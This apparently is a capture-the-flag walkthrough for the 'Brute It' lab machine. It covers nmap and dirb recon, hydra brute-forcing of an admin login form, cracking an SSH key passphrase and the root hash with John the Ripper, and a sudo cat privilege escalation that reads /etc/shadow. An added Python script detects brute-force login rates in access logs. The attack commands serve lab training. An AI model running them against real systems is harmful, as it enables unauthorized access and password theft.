Brute It

Use sudo nmap to scan for open ports: sudo nmap -sS


22/tcp open  ssh

80/tcp open  http

Use dirb tool to uncover hidden directories on the web server:


Inspect the page source and the following clue will appear:

<!-- Hey john, if you do not remember, the username is admin -->

john could be an SSH username

Make a failed login attempt while inspecting the page, head to the Network tab and then to the Request tab. Click on the request payload to see the format used.

Use hydra to brute-force the login page:

hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/admin/:user=^USER^&pass=^PASS^:F=invalid"

[80][http-post-form] host:   login: admin   password: ******
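From the defender's side, the hydra run above leaves a very visible trace: one client sending many POSTs to /admin/ within seconds, all answered with the same 200 page. The following added script (not part of the original writeup) parses constructed combined-format access log lines and flags any IP whose login POST rate within a sliding window crosses a threshold; the IPs, timestamps and the 20-requests-per-60-seconds threshold are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Combined-format access log line, e.g.
# 10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "POST /admin/ HTTP/1.1" 200 1250
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, datetime, method, path, status) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return (m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"], m["path"], int(m["status"]))


def find_bruteforce(lines, login_path="/admin/", window_s=60, threshold=20):
    """Return {ip: peak number of POSTs to login_path inside any window_s-second window}
    for every IP that reaches threshold. Failed logins on this form return 200 just like
    a success (hydra matched the 'invalid' string, not a status code), so the detector
    keys on request rate per source, not on the status column."""
    windows = defaultdict(deque)   # ip -> timestamps of recent login POSTs
    peaks = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        if method != "POST" or path != login_path:
            continue
        q = windows[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:   # drop entries older than the window
            q.popleft()
        if len(q) >= threshold:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks


# Constructed sample: one client hammering /admin/, one ordinary browser session, one junk line.
SAMPLE_LOG = [
    f'10.0.0.5 - - [12/Mar/2024:10:00:{i % 60:02d} +0000] "POST /admin/ HTTP/1.1" 200 1250'
    for i in range(45)
] + [
    '10.0.0.9 - - [12/Mar/2024:10:00:10 +0000] "GET /admin/ HTTP/1.1" 200 1250',
    '10.0.0.9 - - [12/Mar/2024:10:00:25 +0000] "POST /admin/ HTTP/1.1" 302 0',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for ip, n in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {n} login POSTs within 60s")   # 10.0.0.5: 45 login POSTs within 60s
```

The same logic works on a real access log when the lines are read from a file instead of SAMPLE_LOG; rate limiting or lockout on the login endpoint is the corresponding mitigation.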

Log in to the form page: the web flag is shown along with a private RSA key.

Copy the RSA key into a text file named ida_rsa

Locate ssh2john, copy it to your current folder and execute it against the key file: python ssh2john.py ida_rsa > id_rsa.hash

Crack the hash with: sudo john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

rockinroll       (ida_rsa)

ssh to the user john with the RSA key and passphrase: ssh -i ida_rsa john@

cat user.txt to find the flag

Run sudo -l to check which commands we can run with sudo:

 (root) NOPASSWD: /bin/cat

sudo cat /root/root.txt gives the final flag

sudo cat /etc/shadow and copy the root password hash:


Use John the Ripper to crack the hash: john -w=/usr/share/wordlists/rockyou.txt roothash

The root password is found.

